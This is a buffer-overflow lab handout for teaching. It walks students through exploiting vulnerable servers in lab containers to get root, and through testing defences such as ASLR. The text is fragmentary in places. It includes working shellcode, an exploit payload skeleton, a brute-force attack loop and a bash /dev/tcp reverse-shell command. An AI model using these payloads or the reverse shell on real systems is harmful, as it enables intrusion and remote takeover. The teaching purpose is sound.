Buffer Overflow Server
1 Overview
Buffer overflow is defined as the condition in which a program attempts to write data beyond the boundary
of a buffer. This vulnerability can be used by a malicious user to alter the flow control of the program,
leading to the execution of malicious code. The objective of this lab is for students to gain practical insights
into this type of vulnerability, and learn how to exploit the vulnerability in attacks.
In this lab, students will be given four different servers, each running a program with a buffer-overflow
vulnerability. Their task is to develop a scheme to exploit the vulnerability and finally gain the root privilege
on these servers. In addition to the attacks, students will also experiment with several countermeasures
against buffer-overflow attacks. Students need to evaluate whether the schemes work or not and explain
why. This lab covers the following topics:
Readings and videos. Detailed coverage of the buffer-overflow attack can be found in the following:
• Chapter 4 of the SEED Book, Computer & Internet Security: A Hands-on Approach, 2nd Edition, by
Wenliang Du. See details at https://www.handsonsecurity.net.
• Section 4 of the SEED Lecture at Udemy, Computer Security: A Hands-on Approach, by Wenliang
Du. See details at https://www.handsonsecurity.net/video.html.
Lab environment. This lab has been tested on the SEED Ubuntu 20.04 VM. You can download a pre-built
image from the SEED website, and run the SEED VM on your own computer. However, most of the SEED
labs can be conducted on the cloud, and you can follow our instructions to create a SEED VM on the cloud.
Note for instructors. Instructors can customize this lab by choosing values for L1, ..., L4. See Section 2.2
for details. Depending on the background of students and the time allocated for this lab, instructors can also
make the Level-2, Level-3, and Level-4 tasks (or some of them) optional. The Level-1 task is sufficient
to cover the basics of buffer-overflow attacks. Levels 2 to 4 increase the attack difficulty. All the
countermeasure tasks are based on the Level-1 task, so skipping the other levels does not affect those tasks.
return 1;
}
The above program has a buffer overflow vulnerability. It reads data from the standard input, and then
passes the data to another buffer in the function bof(). The original input can have a maximum length
of 517 bytes, but the buffer in bof() is only BUF_SIZE bytes long, which is less than 517. Because
strcpy() does not check boundaries, buffer overflow will occur.
The program will run on a server with the root privilege, and its standard input will be redirected to a
TCP connection between the server and a remote user. Therefore, the program actually gets its data from a
SEED Labs – Buffer Overflow Attack Lab (Server Version) 3
remote user. If users can exploit this buffer overflow vulnerability, they can get a root shell on the server.
Compilation. To compile the above vulnerable program, we need to turn off the StackGuard and the non-
executable stack protections using the -fno-stack-protector and "-z execstack" options. The
following is an example of the compilation command (the L1 environment variable sets the value for the
BUF_SIZE constant inside stack.c).
$ gcc -DBUF_SIZE=$(L1) -o stack -z execstack -fno-stack-protector stack.c
We will compile the stack program into both 32-bit and 64-bit binaries. Our pre-built Ubuntu 20.04
VM is a 64-bit VM, but it still supports 32-bit binaries. All we need to do is to use the -m32 option in the
gcc command. For 32-bit compilation, we also use -static to generate a statically-linked binary, which
is self-contained and does not depend on any dynamic library, because the 32-bit dynamic libraries are not
installed in our containers.
The compilation commands are already provided in Makefile. To compile the code, you need to type
make to execute those commands. The variables L1, L2, L3, and L4 are set in Makefile; they will be
used during the compilation. After the compilation, we need to copy the binaries into the bof-containers
folder, so they can be used by the containers. The following commands perform compilation and installation.
$ make
$ make install
For instructors (customization). To make the lab slightly different from the one offered in the past,
instructors can change the value for BUF_SIZE by requiring students to compile the server code using
different BUF_SIZE values. In Makefile, the BUF_SIZE value is set by four variables L1, ..., L4.
Instructors should pick the values for these variables based on the following suggestions:
The Server Program. In the server-code folder, you can find a program called server.c. This is
the main entry point of the server. It listens to port 9090. When it receives a TCP connection, it invokes
the stack program, and sets the TCP connection as the standard input of the stack program. This way,
when stack reads data from stdin, it actually reads from the TCP connection, i.e. the data are provided
by the user on the TCP client side. It is not necessary for students to read the source code of server.c.
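The redirection described above can be illustrated with a minimal Python sketch. It is not the lab's server.c; the names serve_once and demo, the ephemeral localhost port, and the upper-casing child process (a stand-in for the stack program) are all assumptions made for illustration.

```python
import socket
import subprocess
import sys


def serve_once(listener, argv):
    """Accept one TCP connection and run argv with that connection as its stdin."""
    conn, _addr = listener.accept()
    with conn:
        # Passing the socket's file descriptor as stdin means that every read
        # the child performs on stdin actually reads from the TCP connection.
        result = subprocess.run(argv, stdin=conn.fileno(), stdout=subprocess.PIPE)
    return result.stdout


def demo():
    """Run one round trip on an ephemeral localhost port (the lab server uses 9090)."""
    # Hypothetical stand-in for the stack program: echo stdin in upper case.
    child = [sys.executable, "-c",
             "import sys; sys.stdout.write(sys.stdin.read().upper())"]
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as listener:
        listener.bind(("127.0.0.1", 0))
        listener.listen(1)
        # The client plays the role of "echo hello | nc <server> <port>".
        with socket.create_connection(listener.getsockname()) as client:
            client.sendall(b"hello")
        # The connection is already queued, so accept() returns immediately.
        return serve_once(listener, child)
```

Calling demo() returns whatever the child wrote to its standard output after reading the client's bytes from its standard input.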
In the following, we list some of the commonly used commands related to Docker and Compose. Since
we are going to use these commands very frequently, we have created aliases for them in the .bashrc file
(in our provided SEEDUbuntu 20.04 VM).
$ docker-compose build # Build the container image
$ docker-compose up # Start the container
$ docker-compose down # Shut down the container
All the containers will be running in the background. To run commands on a container, we often need
to get a shell on that container. We first need to use the "docker ps" command to find out the ID of
the container, and then use "docker exec" to start a shell on that container. We have created aliases for
them in the .bashrc file.
$ dockps // Alias for: docker ps --format "{{.ID}} {{.Names}}"
$ docksh <id> // Alias for: docker exec -it <id> /bin/bash
$ docksh 96
root@9652715c8e0a:/#
If you encounter problems when setting up the lab environment, please read the “Common Problems”
section of the manual for potential solutions.
Note. It should be noted that before running "docker-compose build" to build the docker images,
we need to compile and copy the server code to the bof-containers folder. This step is described in
Section 2.2.
shellcode = (
"\xeb\x29\x5b\x31\xc0\x88\x43\x09\x88\x43\x0c\x88\x43\x47\x89\x5b"
"\x48\x8d\x4b\x0a\x89\x4b\x4c\x8d\x4b\x0d\x89\x4b\x50\x89\x43\x54"
"\x8d\x4b\x48\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xe8\xd2\xff\xff\xff"
"/bin/bash*"                                                  # ①
"-c*"                                                         # ②
"/bin/ls -l; echo Hello; /bin/tail -n 2 /etc/passwd        *" # ③
# The * in this line serves as the position marker         *
"AAAA" # Placeholder for argv[0] --> "/bin/bash"
"BBBB" # Placeholder for argv[1] --> "-c"
"CCCC" # Placeholder for argv[2] --> the command string
"DDDD" # Placeholder for argv[3] --> NULL
).encode('latin-1')
The shellcode runs the "/bin/bash" shell program (Line ①), but it is given two arguments, "-c"
(Line ②) and a command string (Line ③). This indicates that the shell program will run the commands in the
second argument. The * at the end of these strings is only a placeholder, and it will be replaced by one byte
of 0x00 during the execution of the shellcode. Each string needs to have a zero at the end, but we cannot
put zeros in the shellcode. Instead, we put a placeholder at the end of each string, and then dynamically put
a zero in the placeholder during the execution.
If we want the shellcode to run some other commands, we just need to modify the command string
in Line ③. However, when making changes, we need to make sure not to change the length of this string,
because the starting position of the placeholder for the argv[] array, which is right after the command
string, is hardcoded in the binary portion of the shellcode. If we change the length, we need to modify the
binary part. To keep the star at the end of this string at the same position, you can add or delete spaces.
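The fixed-length requirement can be handled mechanically. The helper below is a sketch, not part of the lab files; the name make_command_field is hypothetical. The field length is an assumption derived from reading the displacement bytes in the binary part of the 32-bit shellcode (the command appears to start at offset 0x0d and its marker at offset 0x47), so re-check it against your own copy of the shellcode.

```python
# Field length implied by the offsets in the binary part of the 32-bit
# shellcode: the command starts at offset 0x0d and its '*' marker sits at
# offset 0x47. This is an assumption read off the bytes, not a documented value.
CMD_FIELD_LEN = 0x47 - 0x0D + 1  # 59 bytes, including the trailing '*'


def make_command_field(command, field_len=CMD_FIELD_LEN):
    """Pad command with spaces so that the '*' marker lands at a fixed position."""
    room = field_len - 1  # one byte is reserved for the '*' marker
    if len(command) > room:
        raise ValueError(f"command is {len(command)} bytes; at most {room} fit")
    if "\x00" in command:
        raise ValueError("the command must not contain zero bytes")
    return command.ljust(room) + "*"


field = make_command_field("/bin/ls -l /tmp; echo Done")
```

The resulting string can replace the command string in the shellcode listing; the trailing spaces are harmless to the shell, and the marker stays where the binary part expects it.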
You can find the generic shellcode in the shellcode folder. Inside, you will see two Python programs,
shellcode_32.py and shellcode_64.py. They are for 32-bit and 64-bit shellcode, respectively.
These two Python programs will write the binary shellcode to codefile_32 and codefile_64,
respectively. You can then use call_shellcode to execute the shellcode in them.
// Generate the shellcode binary
$ ./shellcode_32.py --> generate codefile_32
$ ./shellcode_64.py --> generate codefile_64
// Compile call_shellcode.c
$ make --> generate a32.out and a64.out
Task. Please modify the shellcode so that you can use it to delete a file. Please include your modified
shellcode in the lab report, as well as your screenshots.
4.1 Server
Our first target runs on 10.9.0.5 (the port number is 9090), and the vulnerable program stack is a
32-bit program. Let’s first send a benign message to this server. We will see the following messages printed
out by the target container (the actual messages you see may be different).
// On the VM (i.e., the attacker machine)
$ echo hello | nc 10.9.0.5 9090
Press Ctrl+C
The server accepts up to 517 bytes of data from the user, which is enough to cause a buffer overflow.
Your job is to construct your payload to exploit this vulnerability. If you save your payload in a file, you can
send the payload to the server using the following command.
$ cat <file> | nc 10.9.0.5 9090
If the server program returns, it will print out "Returned Properly". If this message is not printed
out, the stack program has probably crashed. The server will still keep running, taking new connections.
For this task, two pieces of information essential for buffer-overflow attacks are printed out as hints to
students: the value of the frame pointer and the address of the buffer (lines marked by P). The frame pointer
register is called ebp in the x86 architecture and rbp in the x64 architecture. You can use these two pieces
of information to construct your payload.
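As a worked example of how the two hints combine, the sketch below computes where the return address sits relative to the start of the buffer. It assumes the conventional x86 frame layout, in which the return address is stored one word above the saved frame pointer. The two addresses are hypothetical; use the values printed by your own server.

```python
def return_address_offset(frame_pointer, buffer_address, word_size=4):
    """Offset from the start of the buffer to the saved return address.

    Assumes the conventional frame layout: the frame pointer register points
    at the saved frame pointer, and the return address is stored one word
    above it (4 bytes on x86, 8 bytes on x64).
    """
    distance = frame_pointer - buffer_address
    if distance < 0:
        raise ValueError("the buffer is expected to lie below the frame pointer")
    return distance + word_size


# Hypothetical values, standing in for the hints printed by the server.
EBP = 0xFFFFD5F8
BUFFER = 0xFFFFD588
OFFSET = return_address_offset(EBP, BUFFER)  # 0x70 + 4 = 116
```

With these example numbers, bytes 116 to 119 of the input are the ones that overwrite the return address.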
Added randomness. We have added a little bit of randomness in the program, so different students are
likely to see different values for the buffer address and frame pointer. The values only change when the
container restarts, so as long as you keep the container running, you will see the same numbers (the numbers
seen by different students are still different). This randomness is different from the address-randomization
countermeasure. Its sole purpose is to make students’ work a little bit different.
).encode('latin-1')
##################################################################
# Put the shellcode somewhere in the payload
start = 0 # Need to change
content[start:start + len(shellcode)] = shellcode
After you finish the above program, run it. This will generate the contents for badfile. Then feed
it to the vulnerable server. If your exploit is implemented correctly, the command you put inside your
shellcode will be executed. If your command generates some outputs, you should be able to see them from
the container window. Please provide evidence showing that you can successfully get the vulnerable server to
run your commands.
$ ./exploit.py // create the badfile
$ cat badfile | nc 10.9.0.5 9090
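One possible layout for a 32-bit payload is sketched below. It is not the lab's exploit.py: the function name build_payload, the placeholder shellcode bytes, the offset, and the return address are all hypothetical, and placing the shellcode at the end of a NOP-filled buffer is only one of several workable choices.

```python
PAYLOAD_SIZE = 517  # the server reads at most 517 bytes
NOP = 0x90          # x86 no-operation instruction


def build_payload(shellcode, ret, offset, word_size=4, size=PAYLOAD_SIZE):
    """Fill the payload with NOPs, put the shellcode at the end, and write the
    new return address at the given offset from the start of the buffer."""
    ret_bytes = ret.to_bytes(word_size, byteorder="little")
    if 0 in ret_bytes:
        raise ValueError("strcpy() stops at a zero byte inside the address")
    start = size - len(shellcode)
    if offset + word_size > start:
        raise ValueError("the return address would overlap the shellcode")
    content = bytearray([NOP] * size)
    content[start:] = shellcode
    content[offset:offset + word_size] = ret_bytes
    return bytes(content)


# Hypothetical inputs: a 32-byte stand-in for the shellcode, an offset of 116,
# and a return address that points into the NOP region above the frame pointer.
FAKE_SHELLCODE = b"\xcc" * 32
payload = build_payload(FAKE_SHELLCODE, ret=0xFFFFD608, offset=116)
```

Writing the result with open("badfile", "wb") would produce a file that can be sent with the cat and nc command shown above. The zero-byte check matters because strcpy() stops copying at the first zero it sees.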
Reverse shell. We are not interested in running some pre-determined commands. We want to get a root
shell on the target server, so we can type any command we want. Since we are on a remote machine, if we
simply get the server to run /bin/sh, we won’t be able to control the shell program. Reverse shell is a
typical technique to solve this problem. Section 10 provides detailed instructions on how to run a reverse
shell. Please modify the command string in your shellcode, so you can get a reverse shell on the target
server. Please include screenshots and explanation in your lab report.
As you can see, the server only gives out one hint, the address of the buffer; it does not reveal the
value of the frame pointer. This means that the size of the buffer is unknown to you, which makes exploiting
the vulnerability more difficult than in the Level-1 attack. Although the actual buffer size can be found in
Makefile, you are not allowed to use that information in the attack, because in the real world, it is
unlikely that you will have this file. To simplify the task, we do assume that the range of the buffer size
is known. Another fact that may be useful to you is that, due to memory alignment, the value stored in
the frame pointer is always a multiple of four (for 32-bit programs).
Range of the buffer size (in bytes): [100, 300]
Your job is to construct one payload to exploit the buffer overflow vulnerability on the server, and get
a root shell on the target server (using the reverse shell technique). Please note that you are only allowed
to construct one payload that works for any buffer size within this range. You will not get full credit if
you use the brute-force method, i.e., trying one buffer size each time. The more you try, the easier it is for
the victim to detect and defeat the attack. That is why minimizing the number of trials is important for attacks. In
your lab report, you need to describe your method and provide evidence.
You can see that the values of the frame pointer and the buffer’s address are now 8 bytes long (instead of 4 bytes
in 32-bit programs). Your job is to construct your payload to exploit the buffer overflow vulnerability of the
server. Your ultimate goal is to get a root shell on the target server. You can use the shellcode from Task 1,
but you need to use the 64-bit version of the shellcode.
Challenges. Compared to buffer-overflow attacks on 32-bit machines, attacks on 64-bit machines are more
difficult. The most difficult part is the address. Although the x64 architecture supports a 64-bit address space,
only addresses from 0x00 through 0x00007FFFFFFFFFFF are allowed. That means for every address
(8 bytes), the highest two bytes are always zeros. This causes a problem.
In our buffer-overflow attacks, we need to store at least one address in the payload, and the payload will
be copied into the stack via strcpy(). We know that the strcpy() function will stop copying when it
sees a zero. Therefore, if a zero appears in the middle of the payload, the content after the zero cannot be
copied into the stack. How to solve this problem is the most difficult challenge in this attack. In your report,
you need to describe how you solve this problem.
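The effect of the zero bytes can be seen in a short simulation. The sketch below only models where strcpy() stops; it does not solve the challenge. The address and the filler bytes are hypothetical, and strcpy_copied is an illustrative helper, not a library function.

```python
def strcpy_copied(src):
    """Return the bytes that strcpy() would copy from src, not counting the
    terminating zero: everything before the first zero byte."""
    end = src.find(b"\x00")
    return src if end < 0 else src[:end]


# Hypothetical user-space stack address; its two highest bytes are zero.
ADDRESS = 0x00007FFFFFFFE3C0
packed = ADDRESS.to_bytes(8, byteorder="little")

# Hypothetical layout: 16 filler bytes, then the address, then 16 more bytes.
payload = b"A" * 16 + packed + b"B" * 16
copied = strcpy_copied(payload)
```

Here copied holds the 16 filler bytes and the six non-zero bytes of the address. Nothing placed after the address reaches the stack.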
Please send a hello message to the Level 1 and Level 3 servers, and do it multiple times. In your report,
please report your observation, and explain why ASLR makes the buffer-overflow attack more difficult.
Defeating the 32-bit randomization. It was reported that on 32-bit Linux machines, only 19 bits can be
used for address randomization. That is not enough, and we can easily hit the target if we run the attack
a sufficient number of times. For 64-bit machines, the number of bits used for randomization is significantly
increased.
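To get a feel for why 19 bits is not enough, the following back-of-the-envelope sketch estimates how many attempts a brute-force attack needs. It assumes a simplified model: every attempt uses the same guessed address, the address is re-randomized uniformly and independently for each run, and exactly one of the 2^19 positions matches. Real layouts may deviate from this model, and the function names are illustrative.

```python
import math


def success_probability(entropy_bits, attempts):
    """Probability that at least one of the attempts hits the right address."""
    p = 1.0 / (2 ** entropy_bits)
    # 1 - (1 - p)^attempts, computed with log1p/expm1 for numerical stability.
    return -math.expm1(attempts * math.log1p(-p))


def attempts_for_probability(entropy_bits, target):
    """Smallest number of attempts whose success probability reaches target."""
    p = 1.0 / (2 ** entropy_bits)
    return math.ceil(math.log1p(-target) / math.log1p(-p))


POSITIONS = 2 ** 19  # 524288 possible positions with 19 bits of randomness
HALF_CHANCE = attempts_for_probability(19, 0.5)
```

Under this model, a 50% chance of success takes a few hundred thousand attempts, so the time needed depends mainly on how many attempts per second the loop can make.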
In this task, we will give it a try on the 32-bit Level 1 server. We use the brute-force approach to attack
the server repeatedly, hoping that the address we put in our payload can eventually be correct. We will use
the payload from the Level-1 attack. You can use the following shell script to run the vulnerable program in
an infinite loop. If you get a reverse shell, the script will stop; otherwise, it will keep running. If you are not
too unlucky, you should be able to get a reverse shell within 10 minutes.
#!/bin/bash
SECONDS=0
value=0
while true; do
value=$(( $value + 1 ))
duration=$SECONDS
min=$(($duration / 60))
sec=$(($duration % 60))
echo "$min minutes and $sec seconds elapsed."
echo "The program has been running $value times so far."
cat badfile | nc 10.9.0.5 9090
done
Defeating the non-executable stack countermeasure. It should be noted that non-executable stack only
makes it impossible to run shellcode on the stack, but it does not prevent buffer-overflow attacks, because
there are other ways to run malicious code after exploiting a buffer-overflow vulnerability. The return-to-
libc attack is an example. We have designed a separate lab for that attack. If you are interested, please see
our Return-to-Libc Attack Lab for details.
The above nc command will block, waiting for a connection. We now directly run the following bash
program on the Server machine (10.0.2.5) to emulate what attackers would run after compromising the
server via the Shellshock attack. This bash command will trigger a TCP connection to the attacker machine’s
port 9090, and a reverse shell will be created. We can see the shell prompt from the above result, indicating
that the shell is running on the Server machine; we can type the ifconfig command to verify that the IP
address is indeed 10.0.2.5, the one belonging to the Server machine. Here is the bash command:
Server(10.0.2.5):$ /bin/bash -i > /dev/tcp/10.0.2.6/9090 0<&1 2>&1
The above command represents the one that would normally be executed on a compromised server. It is
quite complicated, and we give a detailed explanation in the following:
• "/bin/bash -i": The option i stands for interactive, meaning that the shell must be interactive
(must provide a shell prompt).
• "> /dev/tcp/10.0.2.6/9090": This causes the output device (stdout) of the shell to be
redirected to the TCP connection to 10.0.2.6’s port 9090. In Unix systems, stdout’s file
descriptor is 1.
• "0<&1": File descriptor 0 represents the standard input device (stdin). This option tells the system
to use the standard output device as the standard input device. Since stdout is already redirected to
the TCP connection, this option basically indicates that the shell program will get its input from the
same TCP connection.
• "2>&1": File descriptor 2 represents the standard error stderr. This causes the error output to be
redirected to stdout, which is the TCP connection.
In summary, the command starts a bash shell whose input comes from a TCP connection and whose output goes to the
same TCP connection. In our experiment, when the bash shell command is executed on 10.0.2.5, it
connects back to the netcat process started on 10.0.2.6. This is confirmed via the "Connection
from 10.0.2.5 ..." message displayed by netcat.
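The three redirections can be reproduced locally without any network setup. The sketch below uses a local socket pair in place of the TCP connection and a short /bin/sh script in place of the interactive bash shell. Both substitutions are assumptions made so the example is self-contained, and the names run_on_socket and demo are hypothetical.

```python
import socket
import subprocess


def run_on_socket(argv, sock):
    """Start argv with stdin, stdout, and stderr all attached to sock, which
    mirrors the combined effect of "> /dev/tcp/...", "0<&1", and "2>&1"."""
    fd = sock.fileno()
    return subprocess.Popen(argv, stdin=fd, stdout=fd, stderr=fd)


def demo():
    # attacker_end plays the role of netcat; server_end plays the connection
    # that the shell on the compromised machine is attached to.
    attacker_end, server_end = socket.socketpair()
    script = 'read line; echo "out:$line"; echo "err:$line" >&2'
    proc = run_on_socket(["/bin/sh", "-c", script], server_end)
    server_end.close()  # the child keeps its own copies of the descriptor

    attacker_end.sendall(b"hello\n")  # typed by the attacker, read via stdin
    proc.wait()

    chunks = []
    while True:
        chunk = attacker_end.recv(4096)
        if not chunk:  # end of stream: the child has exited
            break
        chunks.append(chunk)
    attacker_end.close()
    return b"".join(chunks)
```

Both the normal output and the error output of the child arrive on the attacker's end of the same connection that carried the input.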
11 Submission
You need to submit a detailed lab report, with screenshots, to describe what you have done and what you
have observed. You also need to explain any observations that are interesting or surprising.
Please also list the important code snippets, each followed by an explanation. Simply attaching code without any
explanation will not receive credit.